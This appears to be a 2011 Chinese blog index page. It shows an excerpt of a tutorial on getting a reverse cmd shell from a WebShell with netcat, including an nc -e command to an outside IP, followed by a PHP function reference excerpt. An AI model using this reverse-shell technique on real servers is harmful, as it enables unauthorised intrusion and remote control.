2011年6月24日

利用WebShell反弹低权限CmdShell

摘要: 虽然是低权限的,能做的事和WebShell上的差不多,不过使用起来还是要方便很多。前提:1.能用WebShell运行cmd命令。方法有很多,首先是WScript.Shell,如果被改名或者被删了,就找可运行目录上传cmd.exe。2.上传nc。可以跟cmd.exe上传到同一目录。步骤:现在本地监听一个端口。nc -vv -l -p 8080最好是80或8080这样的端口,被防火墙拦截的几率小很多。我机器80被Apache占了,就用8080了。在WebShell运行下面命令连接我们监听的端口得到CmdShell:nc -vv 222.71.138.177 8080 -e C:\Documents 阅读全文

posted @ 2011-06-24 06:22 =_=! 阅读(780) 评论(0) 推荐(0) 编辑

PHP语法速查表

摘要: php 函式索引 967 个函式共有 967 个函式Abs: 取得绝对值。 Acos: 取得反余弦值。 ada_afetch: 取得资料库的传回列。 ada_autocommit: 开关自动更动功能。 ada_close: 关闭 Adabas D 连结。 ada_commit: 更动 Adabas D 资料库。 ada_connect: 连结至 Adabas D 资料库。 ada_exec: 执行 SQL 指令。 ada_fetchrow: 取得传回一列。 ada_fieldname: 取得栏位名称。 ada_fieldtype: 取得栏位资料形态。 ada_freeresult: 释出传回资 阅读全文

posted @ 2011-06-24 06:16 =_=! 阅读(236) 评论(0) 推荐(0) 编辑

导航